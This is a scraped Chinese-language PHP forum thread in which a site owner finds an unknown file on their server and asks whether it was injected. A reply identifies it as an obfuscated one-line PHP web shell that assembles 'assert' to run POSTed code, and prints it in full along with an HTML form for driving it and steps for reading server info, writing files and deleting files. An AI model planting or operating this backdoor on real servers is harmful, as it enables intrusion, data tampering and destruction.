>백엔드 개발 >PHP 튜토리얼 >discuz 里面有这段代码

discuz 里面有这段代码

WBOY
WBOY원래의
2016-06-23 13:32:32969검색

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

请问这是什么意思?
我的网站被主机屋封了,然后他们叫我删掉游戏登录器,我不太懂,就看了下FTP里面,
有这段代码,不会是黑客注入的吧?


回复讨论(解决方案)

有一个名为7.php的文件,我从来没见过的,然后里面有这段代码

是木马,利用assert来执行php函数的。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>


然后运行shell.html,
1.在textarea中输入 phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入 file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入 unlink('xxxxx'); 后提交,就能删除xxx文件。

谢谢楼上的解答,我已经删了,就是想知道为什么

是木马,利用assert来执行php函数的。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>


然后运行shell.html,
1.在textarea中输入 phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入 file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入 unlink('xxxxx'); 后提交,就能删除xxx文件。



大神我结贴了,顺便问一下有没有方法防范这种攻击?

都让人留后门了,还能防范吗?

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.